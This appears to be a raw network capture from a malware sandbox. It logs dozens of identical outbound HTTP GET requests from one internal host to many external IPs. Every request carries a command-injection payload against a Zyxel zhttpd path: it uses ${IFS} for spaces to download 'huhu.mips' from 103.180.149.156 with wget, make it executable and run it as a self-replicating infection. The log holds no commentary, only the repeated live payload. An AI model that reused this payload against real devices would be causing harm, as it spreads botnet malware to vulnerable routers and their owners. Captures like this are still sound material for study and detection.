                                                        Feb 2, 2024 06:21:12.991450071 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        5156192.168.2.145939040.170.29.195443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:12.991489887 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        5157192.168.2.143545252.19.234.22443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:12.991559029 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        5158192.168.2.1456406183.61.100.2443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:12.991589069 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        5159192.168.2.1441158166.208.209.218443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:12.991636038 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        5160192.168.2.145677224.39.45.23443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:12.991669893 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        5161192.168.2.1435546138.88.34.14443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:12.991705894 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        5162192.168.2.143689813.72.120.103443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:12.991770983 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        5163192.168.2.1457856152.123.132.11443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:12.991801023 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        5164192.168.2.1448626120.74.235.12443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:12.991837978 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        5165192.168.2.1449408208.156.183.87443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:12.991875887 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        5166192.168.2.1436636158.120.84.155443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:12.991925955 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        5167192.168.2.1459120123.252.210.226443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:12.991944075 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        5168192.168.2.1438134159.79.97.112443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:12.991976976 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        5169192.168.2.1435574157.131.88.136443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:12.992038012 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        5170192.168.2.1446802210.6.88.229443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:12.992088079 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        5171192.168.2.145098845.73.195.207443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:12.992125034 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        5172192.168.2.144922243.249.69.187443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:12.992151022 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        5173192.168.2.144711689.60.64.17443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:12.992218018 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        5174192.168.2.143364849.62.143.105443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:12.992248058 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        5175192.168.2.1445330176.83.64.202443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:12.992296934 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        5176192.168.2.1450082155.249.159.74443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:12.992336035 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        5177192.168.2.1442550105.34.88.184443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:12.992383957 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        5178192.168.2.1437586137.141.85.125443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:12.992450953 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        5179192.168.2.143712874.40.74.47443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:12.992471933 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        5180192.168.2.146067858.14.254.33443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:12.992520094 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        5181192.168.2.1434508181.196.124.160443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:12.992549896 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        5182192.168.2.1432846163.197.142.209443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:12.992592096 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        5183192.168.2.1451304126.157.112.106443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:12.992630005 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        5184192.168.2.144403664.119.111.10443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:12.992691040 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        5185192.168.2.1438262113.253.50.213443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:12.992743015 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        5186192.168.2.1445696175.85.242.68443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:12.992774963 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        5187192.168.2.143604031.45.140.81443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:12.992783070 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        5188192.168.2.144935097.39.209.219443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:12.992837906 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        5189192.168.2.1439212107.7.178.54443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:12.992871046 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        5190192.168.2.1456402134.78.110.74443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:12.992909908 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        5191192.168.2.143323467.3.174.171443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:12.992949009 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        5192192.168.2.1437300179.151.71.153443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:12.992980003 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        5193192.168.2.1434544116.66.204.63443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:12.993032932 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        5194192.168.2.145550890.32.158.241443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:12.993077040 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        5195192.168.2.143804423.18.110.198443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:12.993107080 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        5196192.168.2.1438208217.244.113.20443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:12.993155956 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        5197192.168.2.1437658137.202.32.127443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:12.993180990 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        5198192.168.2.1450122123.111.223.238443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:12.993228912 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        5199192.168.2.1440850118.132.133.109443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:12.993274927 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        5200192.168.2.1450684180.223.218.91443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:12.993310928 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        5201192.168.2.1456514139.185.255.195443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:12.993333101 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        5202192.168.2.145997092.164.206.255443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:12.993375063 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        5203192.168.2.1451016191.243.177.67443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:12.993433952 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        5204192.168.2.1454386156.235.253.38443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:12.993484020 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        5205192.168.2.1455056204.139.215.234443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:12.993516922 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        5206192.168.2.146016046.161.244.31443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:12.993565083 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        5207192.168.2.1445166128.229.3.62443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:12.993613958 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        5208192.168.2.1452886181.84.0.224443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:12.993640900 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        5209192.168.2.1453556206.132.168.162443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:12.993674994 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        5210192.168.2.1442288206.134.190.41443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:12.993733883 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        5211192.168.2.1449576223.236.78.226443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:12.993782997 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        5212192.168.2.144076872.220.186.79443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:12.993812084 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        5213192.168.2.144201880.39.192.137443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:12.993860960 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        5214192.168.2.143552870.191.159.0443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:12.993882895 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        5215192.168.2.1448392118.30.161.21443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:12.993942022 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        5216192.168.2.1446256122.97.255.75443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:12.993973017 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        5217192.168.2.1437978128.116.43.169443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:12.994019032 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        5218192.168.2.1460930135.170.75.104443
                                                        TimestampBytes transferredDirectionData
